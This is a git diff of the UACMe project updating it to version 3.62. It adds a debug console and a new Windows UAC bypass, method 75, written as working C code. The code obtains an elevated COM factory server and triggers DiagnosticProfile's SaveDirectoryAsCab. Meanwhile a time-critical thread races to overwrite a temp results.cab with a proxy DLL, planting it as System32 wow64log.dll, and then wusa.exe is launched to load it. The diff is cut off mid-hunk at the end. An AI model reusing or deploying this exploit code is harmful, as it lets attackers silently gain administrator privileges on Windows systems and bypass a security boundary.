diff --git a/LICENSE.md b/LICENSE.md index 6fcf3e7..3496726 100644 --- a/LICENSE.md +++ b/LICENSE.md @@ -1,4 +1,4 @@ -Copyright (c) 2014 - 2022, UACMe authors +Copyright (c) 2014 - 2022, UACMe Project Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: diff --git a/README.md b/README.md index 0e29f76..8866ef1 100644 --- a/README.md +++ b/README.md @@ -758,11 +758,21 @@ First parameter is number of method to use, second is optional command (executab * Method: IElevatedFactoryServer * Target(s): Attacker defined * Component(s): Attacker defined - * Implementation: ucmVirtualFactoryServer + * Implementation: ucmVFServerTaskSchedMethod * Works from: Windows 8.1 (9600) * Fixed in: unfixed :see_no_evil: * How: - * Code status: added in v3.6.1 +75. Author: zcgonvh derivative by Wh04m1001 + * Type: Elevated COM interface + * Method: IDiagnosticProfile + * Target(s): Attacker defined + * Component(s): Attacker defined + * Implementation: ucmVFServerDiagProfileMethod + * Works from: Windows 7 RTM (7600) + * Fixed in: unfixed :see_no_evil: + * How: - + * Code status: added in v3.6.2 diff --git a/Source/Akagi/Resource.rc b/Source/Akagi/Resource.rc index faeebd2..331974f 100644 Binary files a/Source/Akagi/Resource.rc and b/Source/Akagi/Resource.rc differ diff --git a/Source/Akagi/console.c b/Source/Akagi/console.c new file mode 100644 index 0000000..86e31b0 --- /dev/null +++ b/Source/Akagi/console.c @@ -0,0 +1,125 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2022 +* +* TITLE: CONSOLE.C +* +* VERSION: 3.62 +* +* DATE: 08 Jul 2022 +* +* Debug console. +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ + +#include "global.h" + +HANDLE StdOutputHandle = NULL; + +pswprintf_s _swprintf_s = NULL; + +VOID ConsolePrint( + _In_ LPCWSTR Message +) +{ + WriteConsole(StdOutputHandle, Message, (ULONG)_strlen(Message), NULL, NULL); +} + +VOID ConsolePrintValueUlong( + _In_ LPCWSTR Message, + _In_ ULONG Value, + _In_ BOOL Hexademical +) +{ + WCHAR szText[200]; + + if (_swprintf_s) { + + _swprintf_s(szText, RTL_NUMBER_OF(szText), + Hexademical ? TEXT("%ws 0x%lX\r\n") : TEXT("%ws %lu\r\n"), + Message, + Value); + + ConsolePrint(szText); + } +} + +VOID ConsolePrintStatus( + _In_ LPCWSTR Message, + _In_ NTSTATUS Status +) +{ + ConsolePrintValueUlong(Message, Status, TRUE); +} + +VOID ConsoleInit( + VOID +) +{ + WCHAR szBuffer[100]; + HMODULE hNtdll = GetModuleHandle(L"ntdll.dll"); + + if (hNtdll == NULL || !AllocConsole()) + return; + + _swprintf_s = (pswprintf_s)GetProcAddress(hNtdll, "swprintf_s"); + if (_swprintf_s == NULL) + return; + + StdOutputHandle = GetStdHandle(STD_OUTPUT_HANDLE); + SetConsoleMode(StdOutputHandle, ENABLE_PROCESSED_OUTPUT | + ENABLE_VIRTUAL_TERMINAL_PROCESSING); + + _swprintf_s(szBuffer, RTL_NUMBER_OF(szBuffer), TEXT("[*] UACMe v%lu.%lu.%lu.%lu\r\n"), + UCM_VERSION_MAJOR, + UCM_VERSION_MINOR, + UCM_VERSION_REVISION, + UCM_VERSION_BUILD); + + SetConsoleTitle(szBuffer); +} + +BOOL ConsoleIsKeyPressed( + _In_ WORD VirtualKeyCode +) +{ + BOOL bResult = FALSE; + DWORD numberOfEvents = 0; + INPUT_RECORD inp1; + HANDLE nStdHandle = GetStdHandle(STD_INPUT_HANDLE); + + GetNumberOfConsoleInputEvents(nStdHandle, &numberOfEvents); + + if (numberOfEvents) { + + PeekConsoleInput(nStdHandle, &inp1, 1, &numberOfEvents); + + bResult = (numberOfEvents != 0 && + inp1.EventType == KEY_EVENT && + inp1.Event.KeyEvent.bKeyDown && + inp1.Event.KeyEvent.wVirtualKeyCode == VirtualKeyCode); + + FlushConsoleInputBuffer(nStdHandle); + } + + return bResult; +} + +VOID ConsoleRelease( + VOID +) +{ + DWORD dwStop = GetTickCount() + (10 * 1000); + + ConsolePrint(TEXT("[+] Press Enter to exit or wait few seconds and it will close automatically\r\n")); + + while (!ConsoleIsKeyPressed(VK_RETURN) && GetTickCount() < dwStop) + Sleep(50); + + FreeConsole(); +} diff --git a/Source/Akagi/console.h b/Source/Akagi/console.h new file mode 100644 index 0000000..5c06fc2 --- /dev/null +++ b/Source/Akagi/console.h @@ -0,0 +1,52 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2022 +* +* TITLE: CONSOLE.H +* +* VERSION: 3.62 +* +* DATE: 08 Jul 2022 +* +* Debug console header file. +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ + +#pragma once + +VOID ConsoleInit( + VOID); + +VOID ConsoleRelease( + VOID); + +VOID ConsolePrintStatus( + _In_ LPCWSTR Message, + _In_ NTSTATUS Status); + +VOID ConsolePrint( + _In_ LPCWSTR Message); + +VOID ConsolePrintValueUlong( + _In_ LPCWSTR Message, + _In_ ULONG Value, + _In_ BOOL Hexademical); + +#ifdef _UCM_CONSOLE +#define ucmConsoleInit ConsoleInit +#define ucmConsoleRelease ConsoleRelease +#define ucmConsolePrintStatus ConsolePrintStatus +#define ucmConsolePrint ConsolePrint +#define ucmConsolePrintValueUlong ConsolePrintValueUlong +#else +#define ucmConsoleInit() +#define ucmConsoleRelease() +#define ucmConsolePrintStatus(Message, Status) +#define ucmConsolePrint(Message) +#define ucmConsolePrintValueUlong(Message, Value, Hexademical) +#endif diff --git a/Source/Akagi/global.h b/Source/Akagi/global.h index 993fe05..bcfc40f 100644 --- a/Source/Akagi/global.h +++ b/Source/Akagi/global.h @@ -4,9 +4,9 @@ * * TITLE: GLOBAL.H * -* VERSION: 3.61 +* VERSION: 3.62 * -* DATE: 22 Jun 2022 +* DATE: 07 Jul 2022 * * Common header file for the program support routines. * @@ -82,6 +82,7 @@ #include "compress.h" #include "aic.h" #include "stub.h" +#include "console.h" #include "methods\methods.h" //default execution flow @@ -108,6 +109,8 @@ typedef struct _UACME_CONTEXT { PVOID ucmHeap; pfnDecompressPayload DecompressRoutine; + pswprintf_s swprintf_s; + UACME_FUSION_CONTEXT FusionContext; UACME_SHARED_CONTEXT SharedContext; diff --git a/Source/Akagi/main.c b/Source/Akagi/main.c index b802fae..26f3687 100644 --- a/Source/Akagi/main.c +++ b/Source/Akagi/main.c @@ -26,39 +26,6 @@ PUACMECONTEXT g_ctx; //Image Base Address global variable HINSTANCE g_hInstance; -#define ENABLE_OUTPUT -#undef ENABLE_OUTPUT - -#ifdef ENABLE_OUTPUT -VOID ucmShowVersion( - VOID) -{ - DWORD bytesIO; - WCHAR szVersion[100]; - -#ifdef _DEBUG - if (!AllocConsole()) { - return; - } -#else - if (!AttachConsole(ATTACH_PARENT_PROCESS)) { - return; - } -#endif - - RtlSecureZeroMemory(&szVersion, sizeof(szVersion)); - wsprintf(szVersion, TEXT("v%lu.%lu.%lu.%lu"), - UCM_VERSION_MAJOR, - UCM_VERSION_MINOR, - UCM_VERSION_REVISION, - UCM_VERSION_BUILD); - - WriteConsole(GetStdHandle(STD_OUTPUT_HANDLE), &szVersion, _strlen(szVersion), &bytesIO, NULL); - - FreeConsole(); -} -#endif - /* * ucmInit * @@ -90,6 +57,8 @@ NTSTATUS ucmInit( wdCheckEmulatedVFS(); + ucmConsoleInit(); + bytesIO = 0; RtlQueryElevationFlags(&bytesIO); if ((bytesIO & DBG_FLAG_ELEVATION_ENABLED) == 0) @@ -109,9 +78,6 @@ NTSTATUS ucmInit( RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO); if (bytesIO == 0) { -#ifdef ENABLE_OUTPUT - ucmShowVersion(); -#endif return STATUS_INVALID_PARAMETER; } @@ -193,6 +159,8 @@ NTSTATUS WINAPI ucmMain( OptionalParameter, OptionalParameterLength); + ucmConsolePrintStatus(TEXT("[*] ucmInit"), Status); + if (!NT_SUCCESS(Status)) return Status; @@ -212,5 +180,15 @@ NTSTATUS WINAPI ucmMain( #pragma comment(linker, "/ENTRY:main") VOID __cdecl main() { +#ifdef _UCM_CONSOLE + ULONG result; + + result = StubInit(ucmMain); + ucmConsolePrintValueUlong(TEXT("[+] ucmMain"), result, TRUE); + ucmConsoleRelease(); + ExitProcess(result); + +#else ExitProcess(StubInit(ucmMain)); +#endif } diff --git a/Source/Akagi/methods/comsup.h b/Source/Akagi/methods/comsup.h index f37955f..e1ef987 100644 --- a/Source/Akagi/methods/comsup.h +++ b/Source/Akagi/methods/comsup.h @@ -4,9 +4,9 @@ * * TITLE: COMSUP.H * -* VERSION: 3.61 +* VERSION: 3.62 * -* DATE: 22 Jun 2022 +* DATE: 04 Jul 2022 * * Prototypes and definitions for COM interfaces and routines. * diff --git a/Source/Akagi/methods/elvint.h b/Source/Akagi/methods/elvint.h index 172a936..a00f4a5 100644 --- a/Source/Akagi/methods/elvint.h +++ b/Source/Akagi/methods/elvint.h @@ -4,9 +4,9 @@ * * TITLE: ELVINT.H * -* VERSION: 3.61 +* VERSION: 3.62 * -* DATE: 22 Jun 2022 +* DATE: 04 Jul 2022 * * Prototypes and definitions for elevated interface methods. * @@ -481,7 +481,7 @@ typedef struct IElevatedFactoryServerVtbl { END_INTERFACE -} *PIElevatedFactoryServerVtbll; +} *PIElevatedFactoryServerVtbl; // INTERFACE DEF diff --git a/Source/Akagi/methods/methods.c b/Source/Akagi/methods/methods.c index eab254e..e1b2631 100644 --- a/Source/Akagi/methods/methods.c +++ b/Source/Akagi/methods/methods.c @@ -4,9 +4,9 @@ * * TITLE: METHODS.C * -* VERSION: 3.61 +* VERSION: 3.62 * -* DATE: 22 Jun 2022 +* DATE: 08 Jul 2022 * * UAC bypass dispatch. * @@ -47,7 +47,8 @@ UCM_API(MethodPca); UCM_API(MethodCurVer); UCM_API(MethodMsdt); UCM_API(MethodDotNetSerial); -UCM_API(MethodVFServer); +UCM_API(MethodVFServerTaskSched); +UCM_API(MethodVFServerDiagProf); ULONG UCM_WIN32_NOT_IMPLEMENTED[] = { UacMethodWow64Logger, @@ -60,7 +61,8 @@ ULONG UCM_WIN32_NOT_IMPLEMENTED[] = { UacMethodMsStoreProtocol, UacMethodPca, UacMethodCurVer, - UacMethodVFServer + UacMethodVFServerTaskSched, + UacMethodVFServerDiagProf }; UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = { @@ -138,7 +140,8 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = { { MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodMsdt, { NT_WIN10_THRESHOLD1, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE }, { MethodDotNetSerial, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }, - { MethodVFServer, { NT_WIN8_BLUE, MAXDWORD}, AKATSUKI_ID, FALSE, TRUE, TRUE } + { MethodVFServerTaskSched, { NT_WIN8_BLUE, MAXDWORD}, AKATSUKI_ID, FALSE, TRUE, TRUE }, + { MethodVFServerDiagProf, { NT_WIN7_RTM, MAXDWORD}, AKATSUKI_ID, FALSE, TRUE, TRUE } }; /* @@ -218,6 +221,8 @@ VOID PostCleanupAttempt( _In_ UCM_METHOD Method ) { + BOOL bHit = TRUE; + switch (Method) { case UacMethodDISM: @@ -226,6 +231,7 @@ VOID PostCleanupAttempt( break; case UacMethodWow64Logger: + case UacMethodVFServerDiagProf: ucmMethodCleanupSingleItemSystem32(WOW64LOG_DLL); break; @@ -241,7 +247,13 @@ VOID PostCleanupAttempt( ucmHakrilMethodCleanup(); break; + default: + bHit = FALSE; + break; + } + + ucmConsolePrintValueUlong(TEXT("[+] PostCleanupAttempt for method"), (ULONG)Method, FALSE); } /* @@ -270,8 +282,9 @@ NTSTATUS MethodsManagerCall( return STATUS_NOT_SUPPORTED; } - if (Method >= UacMethodMax) + if (Method >= UacMethodMax) { return STATUS_INVALID_PARAMETER; + } // // Is method implemented for Win32? @@ -291,6 +304,9 @@ NTSTATUS MethodsManagerCall( if (!NT_SUCCESS(Status)) return Status; + ucmConsolePrintValueUlong(TEXT("[+] MethodsManagerCall->Method"), Method, FALSE); + ucmConsolePrintValueUlong(TEXT("[+] MethodsManagerCall->Entry->PayloadResourceId"), Entry->PayloadResourceId, TRUE); + if (Entry->PayloadResourceId != PAYLOAD_ID_NONE) { Resource = supLdrQueryResourceData( @@ -311,6 +327,8 @@ NTSTATUS MethodsManagerCall( ParamsBlock.PayloadCode = PayloadCode; ParamsBlock.PayloadSize = PayloadSize; + ucmConsolePrintValueUlong(TEXT("[+] MethodsManagerCall->Entry->SetParameters"), Entry->SetParameters, FALSE); + // // Set shared parameters. // @@ -319,6 +337,7 @@ NTSTATUS MethodsManagerCall( // if (Entry->SetParameters) { bParametersBlockSet = supCreateSharedParametersBlock(g_ctx); + ucmConsolePrintValueUlong(TEXT("[+] MethodsManagerCall->bParametersBlockSet"), bParametersBlockSet, FALSE); } MethodResult = Entry->Routine(&ParamsBlock); @@ -333,7 +352,8 @@ NTSTATUS MethodsManagerCall( // if (Entry->SetParameters) { if (bParametersBlockSet) { - supWaitForGlobalCompletionEvent(); + Status = supWaitForGlobalCompletionEvent(); + ucmConsolePrintStatus(TEXT("[+] MethodsManagerCall->supWaitForGlobalCompletionEvent"), Status); supDestroySharedParametersBlock(g_ctx); } } @@ -759,9 +779,16 @@ UCM_API(MethodDotNetSerial) return ucmDotNetSerialMethod(lpszPayload); } -UCM_API(MethodVFServer) +UCM_API(MethodVFServerTaskSched) +{ + return ucmVFServerTaskSchedMethod( + Parameter->PayloadCode, + Parameter->PayloadSize); +} + +UCM_API(MethodVFServerDiagProf) { - return ucmVirtualFactoryServer( + return ucmVFServerDiagProfileMethod( Parameter->PayloadCode, Parameter->PayloadSize); } diff --git a/Source/Akagi/methods/methods.h b/Source/Akagi/methods/methods.h index bf132e5..b7e021d 100644 --- a/Source/Akagi/methods/methods.h +++ b/Source/Akagi/methods/methods.h @@ -4,9 +4,9 @@ * * TITLE: METHODS.H * -* VERSION: 3.61 +* VERSION: 3.62 * -* DATE: 22 Jun 2022 +* DATE: 04 Jul 2022 * * Prototypes and definitions for UAC bypass methods table. * @@ -93,7 +93,8 @@ typedef enum _UCM_METHOD { UacMethodNICPoison2, //+ UacMethodMsdt, //+ UacMethodDotNetSerial, //+ - UacMethodVFServer, //+ + UacMethodVFServerTaskSched, //+ + UacMethodVFServerDiagProf, //+ UacMethodMax, UacMethodInvalid = 0xabcdef } UCM_METHOD; diff --git a/Source/Akagi/methods/routines.h b/Source/Akagi/methods/routines.h index 53bee2b..6fb2129 100644 --- a/Source/Akagi/methods/routines.h +++ b/Source/Akagi/methods/routines.h @@ -4,9 +4,9 @@ * * TITLE: ROUTINES.H * -* VERSION: 3.61 +* VERSION: 3.62 * -* DATE: 22 Jun 2022 +* DATE: 04 Jul 2022 * * Prototypes of methods for UAC bypass methods table. * @@ -130,7 +130,11 @@ NTSTATUS ucmTokenModUIAccessMethod( NTSTATUS ucmDebugObjectMethod( _In_ LPWSTR lpszPayload); -NTSTATUS ucmVirtualFactoryServer( +NTSTATUS ucmVFServerTaskSchedMethod( + _In_ PVOID ProxyDll, + _In_ DWORD ProxyDllSize); + +NTSTATUS ucmVFServerDiagProfileMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); diff --git a/Source/Akagi/methods/zcgonvh.c b/Source/Akagi/methods/zcgonvh.c index a6b6096..d84ff6b 100644 --- a/Source/Akagi/methods/zcgonvh.c +++ b/Source/Akagi/methods/zcgonvh.c @@ -4,11 +4,11 @@ * * TITLE: ZCGONVH.C * -* VERSION: 3.61 +* VERSION: 3.62 * -* DATE: 22 Jun 2022 +* DATE: 04 Jul 2022 * -* UAC bypass methods from zcgonvh. +* UAC bypass methods based on zcgonvh original work. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED @@ -20,6 +20,32 @@ #include "global.h" #include "encresource.h" +HRESULT ucmxGetElevatedFactoryServerObject( + _In_ LPCWSTR Clsid, + _Out_ VOID** FactoryServer +) +{ + HRESULT r; + IElevatedFactoryServer* pElevatedServer = NULL; + + *FactoryServer = NULL; + + r = ucmAllocateElevatedObject(Clsid, + &IID_ElevatedFactoryServer, + CLSCTX_LOCAL_SERVER, + (VOID**)&pElevatedServer); + + if (FAILED(r)) + return r; + + if (pElevatedServer == NULL) { + return E_OUTOFMEMORY; + } + + *FactoryServer = pElevatedServer; + return S_OK; +} + BOOL ucmxGetElevatedFactoryServerAndTaskService( _Out_ IElevatedFactoryServer** FactoryServer, _Out_ ITaskService** TaskService @@ -33,19 +59,12 @@ BOOL ucmxGetElevatedFactoryServerAndTaskService( *FactoryServer = NULL; do { - r = ucmAllocateElevatedObject(T_CLSID_VirtualFactoryServer, - &IID_ElevatedFactoryServer, - CLSCTX_LOCAL_SERVER, + r = ucmxGetElevatedFactoryServerObject(T_CLSID_VFServer, (VOID**)&pElevatedServer); if (r != S_OK) break; - if (pElevatedServer == NULL) { - r = E_OUTOFMEMORY; - break; - } - r = pElevatedServer->lpVtbl->ServerCreateElevatedObject(pElevatedServer, &CLSID_TaskScheduler, &IID_ITaskService, @@ -200,7 +219,7 @@ BSTR ucmxBuildParametersForTask( } /* -* ucmVirtualFactoryServer +* ucmVFServerTaskSchedMethod * * Purpose: * @@ -210,7 +229,7 @@ BSTR ucmxBuildParametersForTask( * 2. Use Task Scheduler object to register task running as LocalSystem. * */ -NTSTATUS ucmVirtualFactoryServer( +NTSTATUS ucmVFServerTaskSchedMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) @@ -223,6 +242,8 @@ NTSTATUS ucmVirtualFactoryServer( BSTR bstrXml = NULL; WCHAR szLoaderFileName[MAX_PATH * 2]; + ucmConsolePrint(TEXT("[+] Entering ucmVFServerTaskSchedMethod\r\n")); + hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); do { @@ -266,6 +287,10 @@ NTSTATUS ucmVirtualFactoryServer( pElevatedServer->lpVtbl->Release(pElevatedServer); } + if (pTaskService) { + pTaskService->lpVtbl->Release(pTaskService); + } + if (SUCCEEDED(hr_init)) CoUninitialize(); @@ -274,3 +299,309 @@ NTSTATUS ucmVirtualFactoryServer( return MethodResult; } + +typedef struct _UCMX_OVP { + PVOID ProxyDll; + DWORD ProxyDllSize; + WCHAR TargetFile[MAX_PATH * 2]; //%temp%\hui32\results.cab +} UCMX_OVP, * PUCMX_OVP; + +HANDLE OverwriteThreadHandle = NULL; +LONG TerminateOverwriteThread = FALSE; + +/* +* ucmxOverwriteThread +* +* Purpose: +* +* Thread for race condition, continuously overwrite diagprofile results.cab file with the payload. +* +*/ +DWORD ucmxOverwriteThread( + _In_ PVOID Parameter) +{ + UCMX_OVP params; + HANDLE hTargetFile; + DWORD bytesIO; + + RtlCopyMemory(¶ms, Parameter, sizeof(UCMX_OVP)); + + while (TRUE) { + + if (TerminateOverwriteThread) { + break; + } + + hTargetFile = CreateFile(params.TargetFile, + GENERIC_WRITE, + FILE_SHARE_VALID_FLAGS, + NULL, + OPEN_EXISTING, + FILE_ATTRIBUTE_NORMAL, + NULL); + + if (hTargetFile != INVALID_HANDLE_VALUE) { + + WriteFile(hTargetFile, params.ProxyDll, params.ProxyDllSize, &bytesIO, NULL); + CloseHandle(hTargetFile); + + } + + } + + supHeapFree(Parameter); + CloseHandle(OverwriteThreadHandle); + OverwriteThreadHandle = NULL; + return 0; +} + +/* +* ucmxTriggerDiagProfile +* +* Purpose: +* +* Allocate elevated diag profile object and call SaveDirectoryAsCab method. +* +*/ +HRESULT ucmxTriggerDiagProfile( + _In_ LPCWSTR lpDirectory +) +{ + HRESULT r = E_FAIL; + + IElevatedFactoryServer* pElevatedServer = NULL; + IUnknown* pUnknown = NULL; + IDispatch* pDispatch = NULL; + + CLSID clsid; + + DISPID dispid; + DISPPARAMS dispatchParams; + LPOLESTR methodName = NULL; + + VARIANT result; + VARIANTARG values[2]; + WCHAR szTarget[MAX_PATH * 2]; + + do { + methodName = SysAllocString(L"SaveDirectoryAsCab"); + if (methodName == NULL) + break; + + r = ucmxGetElevatedFactoryServerObject( + T_CLSID_VFServerDiagCpl, + (VOID**)&pElevatedServer); + + if (r != S_OK) + break; + + ucmConsolePrint(TEXT("[+] Elevated Factory Server object allocated\r\n")); + + r = CLSIDFromString(T_CLSID_DiagnosticProfile, &clsid); + if (r != S_OK) + break; + + r = pElevatedServer->lpVtbl->ServerCreateElevatedObject(pElevatedServer, + &clsid, + &IID_IUnknown, + (void**)&pUnknown); + + if (r != S_OK) + break; + + ucmConsolePrint(TEXT("[+] Elevated DiagProfile object allocated\r\n")); + + if (pUnknown == NULL) { + r = E_OUTOFMEMORY; + break; + } + + r = pUnknown->lpVtbl->QueryInterface(pUnknown, &IID_IDispatch, (VOID**)&pDispatch); + + if (r != S_OK) + break; + + ucmConsolePrint(TEXT("[+] QueryInterface success\r\n")); + + if (pDispatch == NULL) { + r = E_OUTOFMEMORY; + break; + } + + r = pDispatch->lpVtbl->GetIDsOfNames(pDispatch, &IID_NULL, &methodName, 1, LOCALE_USER_DEFAULT, &dispid); + if (r != S_OK) + break; + + ucmConsolePrint(TEXT("[+] Dispatch->GetIDsOfNames success\r\n")); + + RtlSecureZeroMemory(&dispatchParams, sizeof(dispatchParams)); + + VariantInit(&values[0]); + + _strcpy(szTarget, g_ctx->szSystemDirectory); + _strcat(szTarget, WOW64LOG_DLL); + + values[0].vt = VT_BSTR; + values[0].bstrVal = SysAllocString(szTarget); + + VariantInit(&values[1]); + values[1].vt = VT_BSTR; + values[1].bstrVal = SysAllocString(lpDirectory); + + dispatchParams.cArgs = 2; + dispatchParams.rgvarg = values; + + VariantInit(&result); + + r = pDispatch->lpVtbl->Invoke(pDispatch, + dispid, + &IID_NULL, + LOCALE_USER_DEFAULT, + DISPATCH_METHOD, + &dispatchParams, + &result, + NULL, + NULL); + + ucmConsolePrintValueUlong(TEXT("[+] Dispatch->Invoke"), r, TRUE); + + if (values[0].bstrVal) SysFreeString(values[0].bstrVal); + if (values[1].bstrVal) SysFreeString(values[1].bstrVal); + + } while (FALSE); + + if (methodName) + SysFreeString(methodName); + + if (pDispatch) { + pDispatch->lpVtbl->Release(pDispatch); + } + + if (pUnknown) { + pUnknown->lpVtbl->Release(pUnknown); + } + + if (pElevatedServer != NULL) { + pElevatedServer->lpVtbl->Release(pElevatedServer); + } + + return r; +} + +/* +* ucmVFServerDiagProfileMethod +* +* Purpose: +* +* Bypass UAC by using Elevated Factory Server COM object. +* +* 1. Allocate Elevated Factory Server COM object and produce with it help Diag Profiler object. +* 2. Use Diag Profiler object to move files into protected area via race condition. +* +*/ +NTSTATUS ucmVFServerDiagProfileMethod( + _In_ PVOID ProxyDll, + _In_ DWORD ProxyDllSize +) +{ + NTSTATUS MethodResult = STATUS_ACCESS_DENIED; + HRESULT hr_init, r; + DWORD dwLastError; + ULONG retryCount = 0; + + UCMX_OVP* ovParams = NULL; + + WCHAR szBuffer[MAX_PATH * 2]; + + ucmConsolePrint(TEXT("[+] Entering ucmVFServerDiagProfileMethod\r\n")); + + hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); + + do { + + // + // Create %temp%\hui32 directory. + // + _strcpy(szBuffer, g_ctx->szTempDirectory); + _strcat(szBuffer, THEOLDNEWTHING); + if (!CreateDirectory((LPCWSTR)&szBuffer, NULL)) { + dwLastError = GetLastError(); + if (dwLastError != ERROR_ALREADY_EXISTS) { + ucmConsolePrintValueUlong(TEXT("[!] Could not create directory\r\n"), dwLastError, TRUE); + break; + } + } + + ovParams = (UCMX_OVP*)supHeapAlloc(sizeof(UCMX_OVP)); + if (ovParams == NULL) + break; + + ovParams->ProxyDll = ProxyDll; + ovParams->ProxyDllSize = ProxyDllSize; + + _strcpy(ovParams->TargetFile, szBuffer); + supPathAddBackSlash(ovParams->TargetFile); + _strcat(ovParams->TargetFile, TEXT("results.cab")); + + OverwriteThreadHandle = CreateThread(NULL, 0, ucmxOverwriteThread, (PVOID)ovParams, 0, NULL); + if (OverwriteThreadHandle == NULL) { + ucmConsolePrintValueUlong(TEXT("[!] Cannot create worker thread\r\n"), GetLastError(), TRUE); + supHeapFree(ovParams); + break; + } + + SetThreadPriority(OverwriteThreadHandle, THREAD_PRIORITY_TIME_CRITICAL); + + r = ucmxTriggerDiagProfile(szBuffer); + if (FAILED(r)) { + ucmConsolePrintValueUlong(TEXT("[!] DiagProfile does not trigger\r\n"), r, TRUE); + break; + } + + _InterlockedExchange((LONG*)&TerminateOverwriteThread, TRUE); + + _strcpy(szBuffer, g_ctx->szSystemDirectory); + _strcat(szBuffer, WOW64LOG_DLL); + + do { + + if (PathFileExists(szBuffer)) { + ucmConsolePrint(TEXT("[+] Payload file installed\r\n")); + break; + } + else + Sleep(1000); + + } while (++retryCount < 10); + + _strcpy(szBuffer, USER_SHARED_DATA->NtSystemRoot); + _strcat(szBuffer, SYSWOW64_DIR); + _strcat(szBuffer, WUSA_EXE); + + if (supRunProcess2(szBuffer, + NULL, + NULL, + SW_HIDE, + 5000)) + { + ucmConsolePrint(TEXT("[+] Target executed\r\n")); + MethodResult = STATUS_SUCCESS; + } + + } while (FALSE); + + if (OverwriteThreadHandle) { + TerminateThread(OverwriteThreadHandle, 0); + CloseHandle(OverwriteThreadHandle); + OverwriteThreadHandle = NULL; + } + + // + // Cleanup. + // + + if (SUCCEEDED(hr_init)) + CoUninitialize(); + + return MethodResult; +} diff --git a/Source/Akagi/stub.c b/Source/Akagi/stub.c index 14e1c62..2341882 100644 --- a/Source/Akagi/stub.c +++ b/Source/Akagi/stub.c @@ -4,9 +4,9 @@ * * TITLE: STUB.C * -* VERSION: 3.61 +* VERSION: 3.62 * -* DATE: 22 Jun 2022 +* DATE: 08 Jul 2022 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED diff --git a/Source/Akagi/sup.c b/Source/Akagi/sup.c index d570acb..f068121 100644 --- a/Source/Akagi/sup.c +++ b/Source/Akagi/sup.c @@ -4,9 +4,9 @@ * * TITLE: SUP.C * -* VERSION: 3.61 +* VERSION: 3.62 * -* DATE: 22 Jun 2022 +* DATE: 08 Jul 2022 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED @@ -2290,7 +2290,9 @@ PVOID supCreateUacmeContext( ULONG Seed, NtBuildNumber = 0; PUACMECONTEXT Context; HANDLE ContextHeap = NtCurrentPeb()->ProcessHeap; - +#ifdef _UCM_CONSOLE + HMODULE hNtdll; +#endif RTL_OSVERSIONINFOW osv; UNREFERENCED_PARAMETER(Method); @@ -2396,6 +2398,15 @@ PVOID supCreateUacmeContext( Context->DecompressRoutine = (pfnDecompressPayload)supDecodePointer(DecompressRoutine); +#ifdef _UCM_CONSOLE + hNtdll = GetModuleHandle(L"ntdll.dll"); + if (hNtdll) { + Context->swprintf_s = (pswprintf_s)GetProcAddress(hNtdll, "swprintf_s"); + } +#else + Context->swprintf_s = (PVOID)-1; +#endif + return (PVOID)Context; } @@ -2637,15 +2648,17 @@ VOID supSetGlobalCompletionEvent( * Wait a little bit for things to complete. * */ -VOID supWaitForGlobalCompletionEvent( +NTSTATUS supWaitForGlobalCompletionEvent( VOID) { LARGE_INTEGER liDueTime; if (g_ctx->SharedContext.hCompletionEvent) { liDueTime.QuadPart = -(LONGLONG)UInt32x32To64(200000, 10000); - NtWaitForSingleObject(g_ctx->SharedContext.hCompletionEvent, FALSE, &liDueTime); + return NtWaitForSingleObject(g_ctx->SharedContext.hCompletionEvent, FALSE, &liDueTime); } + + return STATUS_WAIT_0; } /* diff --git a/Source/Akagi/sup.h b/Source/Akagi/sup.h index e84395e..efa41c1 100644 --- a/Source/Akagi/sup.h +++ b/Source/Akagi/sup.h @@ -4,9 +4,9 @@ * * TITLE: SUP.H * -* VERSION: 3.61 +* VERSION: 3.62 * -* DATE: 22 Jun 2022 +* DATE: 07 Jul 2022 * * Common header file for the program support routines. * @@ -18,6 +18,12 @@ *******************************************************************************/ #pragma once +typedef int(__cdecl* pswprintf_s)( + wchar_t* buffer, + size_t sizeOfBuffer, + const wchar_t* format, + ...); + #define TEXT_SECTION ".text" #define TEXT_SECTION_LEGNTH sizeof(TEXT_SECTION) @@ -344,7 +350,7 @@ VOID supGenerateSharedObjectName( VOID supSetGlobalCompletionEvent( VOID); -VOID supWaitForGlobalCompletionEvent( +NTSTATUS supWaitForGlobalCompletionEvent( VOID); NTSTATUS supOpenClassesKey( diff --git a/Source/Akagi/uacme.vcxproj b/Source/Akagi/uacme.vcxproj index d974e33..9586d06 100644 --- a/Source/Akagi/uacme.vcxproj +++ 